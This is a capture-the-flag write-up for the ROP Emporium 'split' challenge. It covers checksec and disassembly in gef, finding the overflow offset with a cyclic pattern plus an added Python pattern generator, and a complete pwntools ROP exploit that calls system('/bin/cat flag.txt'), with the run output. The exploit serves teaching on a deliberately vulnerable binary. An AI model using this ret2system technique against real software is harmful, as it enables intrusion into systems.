Protection mechanisms
gef➤ checksec
[+] checksec for '/home/kali/wargame/ROP/split/split'
[*] gef.py:L8789 'checksec' is deprecated and will be removed in a feature release. Use Elf(fname).checksec()
Canary : ✘
NX : ✓
PIE : ✘
Fortify : ✘
RelRO : Partial
Code analysis
gef➤ disas pwnme
Dump of assembler code for function pwnme:
0x000000000040071f <+55>: lea rax,[rbp-0x20] // rax = rbp-0x20
0x0000000000400723 <+59>: mov edx,0x60 // edx = 0x60
0x0000000000400728 <+64>: mov rsi,rax // rsi = rbp-0x20
0x000000000040072b <+67>: mov edi,0x0 // edi = 0x0
0x0000000000400730 <+72>: call 0x400590 <read@plt> // read(0, rbp-0x20, 0x60)
End of assembler dump.
gef➤ disas usefulFunction
Dump of assembler code for function usefulFunction:
0x0000000000400742 <+0>: push rbp
0x0000000000400743 <+1>: mov rbp,rsp
0x0000000000400746 <+4>: mov edi,0x40084a
0x000000000040074b <+9>: call 0x400560 <system@plt>
0x0000000000400750 <+14>: nop
0x0000000000400751 <+15>: pop rbp
0x0000000000400752 <+16>: ret
End of assembler dump.
gef➤ x/s 0x40084a
0x40084a: "/bin/ls"
gef➤ grep /bin/cat
[+] Searching '/bin/cat' in memory
[+] In '/home/kali/wargame/ROP/split/split'(0x601000-0x602000), permission=rw-
0x601060 - 0x601071 → "/bin/cat flag.txt"
- read(0, rbp-0x20, 0x60) reads up to 0x60 bytes into a 0x20-byte stack buffer, so a stack buffer overflow occurs.
- Since the binary itself calls system, the PLT and GOT entries of system are available.
- The string "/bin/cat flag.txt" exists inside the binary (at 0x601060).
Finding the offset
gef➤ pattern create 0x100
[+] Generating a pattern of 256 bytes (n=8)
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaab
[+] Saved as '$_gef0'
gef➤ r
Starting program: /home/kali/wargame/ROP/split/split
[*] Failed to find objfile or not a valid file format: [Errno 2] No such file or directory: 'system-supplied DSO at 0x7ffff7fca000'
split by ROP Emporium
x86_64
Contriving a reason to ask user for data...
> aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaab
Thank you!
Program received signal SIGSEGV, Segmentation fault.
0x0000000000400741 in pwnme ()
gef➤ x/gx $rsp
0x7fffffffdf08: 0x6161616161616166
gef➤ pattern search 0x6161616161616166
[+] Searching for '6661616161616161'/'6161616161616166' with period=8
[+] Found at offset 40 (little-endian search) likely
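To show where the offset 40 comes from, here is an added example that is not part of the original write-up and is not gef's own code. It reimplements the de Bruijn pattern that `pattern create` generates (the standard FKM construction, assumed here to match gef's defaults of alphabet a-z and n=8; the 256 bytes printed above are embedded so the generator can be checked against them) and then searches that pattern for the crashed value the way `pattern search` does. It also relates the result to the disassembly: the buffer sits at rbp-0x20, and 0x20 bytes plus the 8-byte saved rbp gives the same 40.

```python
import string
import struct

# gef's defaults for `pattern create` (assumed to match the output above)
ALPHABET = string.ascii_lowercase   # a-z
PERIOD = 8                          # n=8: every 8-character window is unique, so one qword identifies a position

# The 256-byte pattern gef printed on this page; used below to check the generator.
GEF_PATTERN = (
    "aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaa"
    "iaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaa"
    "qaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaa"
    "yaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaab"
)


def cyclic_pattern(length, alphabet=ALPHABET, n=PERIOD):
    """Return the first `length` characters of the de Bruijn sequence B(k, n).

    FKM (Lyndon word) construction: the sequence is the concatenation, in
    lexicographic order, of all Lyndon words whose length divides n. Within one
    full cycle every n-character window occurs exactly once. The generator is
    lazy, so only `length` characters of the (huge) cycle are ever produced.
    """
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in a[1:p + 1]:
                    yield alphabet[i]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    out = []
    for ch in db(1, 1):
        out.append(ch)
        if len(out) == length:
            break
    return "".join(out)


def find_offset(value, pattern):
    """Locate the qword `value` (as read from a register or the stack) inside `pattern`.

    The value is packed little-endian first, because that is the byte order in
    which the pattern sat in memory; big-endian is tried as a fallback, as gef
    does. Returns -1 if the value does not come from the pattern at all.
    """
    data = pattern.encode()
    for order in ("<", ">"):
        idx = data.find(struct.pack(order + "Q", value))
        if idx != -1:
            return idx
    return -1


def windows_unique(pattern, n=PERIOD):
    """True if no n-character window repeats, i.e. a hit from find_offset is unambiguous."""
    windows = [pattern[i:i + n] for i in range(len(pattern) - n + 1)]
    return len(windows) == len(set(windows))


def frame_offset(buffer_below_rbp, saved_rbp_size=8):
    """Offset from the buffer start to the return address: buffer size + saved rbp."""
    return buffer_below_rbp + saved_rbp_size


if __name__ == "__main__":
    pat = cyclic_pattern(256)
    print("matches gef output:", pat == GEF_PATTERN)
    crash_value = 0x6161616161616166              # the qword found at $rsp after the SIGSEGV
    print("offset:", find_offset(crash_value, pat))       # 40
    print("from disassembly:", frame_offset(0x20))        # lea rax,[rbp-0x20] -> 0x20 + 8 = 40
```

The little-endian search finds "faaaaaaa" at index 40 of the pattern, which is exactly the value sitting at $rsp when `ret` faulted; because every 8-character window of the sequence is unique, that single qword pins down the position without ambiguity.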
Exploit code
from pwn import *

def slog(name, addr):
    return success(": ".join([name, hex(addr)]))

p = process("./split")
e = ELF("./split")
libc = e.libc                                   # resolved here but not used by this payload
r = ROP(e)

system_plt = e.plt['system']                    # system@plt (the call target in usefulFunction)
pop_rdi = r.find_gadget(['pop rdi', 'ret'])[0]  # gadget that loads the first argument
flag = 0x601060                                 # "/bin/cat flag.txt", located with grep above
slog("system@plt", system_plt)
slog("pop rdi; ret", pop_rdi)

payload = b'A' * 40                             # 0x20-byte buffer + saved rbp (offset 40)
payload += p64(pop_rdi) + p64(flag)             # rdi = "/bin/cat flag.txt"
payload += p64(system_plt)                      # return into system(rdi)

p.sendlineafter(b"> ", payload)                 # bytes delimiters avoid the BytesWarning
p.recvuntil(b"Thank you!")
p.interactive()
Exploit
kali@kali ~/wargame/ROP/split python3 exploit.py
[+] Starting local process './split': pid 2746
[*] '/home/kali/wargame/ROP/split/split'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] '/usr/lib/x86_64-linux-gnu/libc-2.33.so'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] Loaded 14 cached gadgets for './split'
/home/kali/.local/lib/python3.10/site-packages/pwnlib/tubes/tube.py:822: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/
res = self.recvuntil(delim, timeout=timeout)
/home/kali/wargame/ROP/split/exploit.py:25: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/
p.recvuntil("Thank you!")
[*] Switching to interactive mode
ROPE{a_placeholder_32byte_flag!}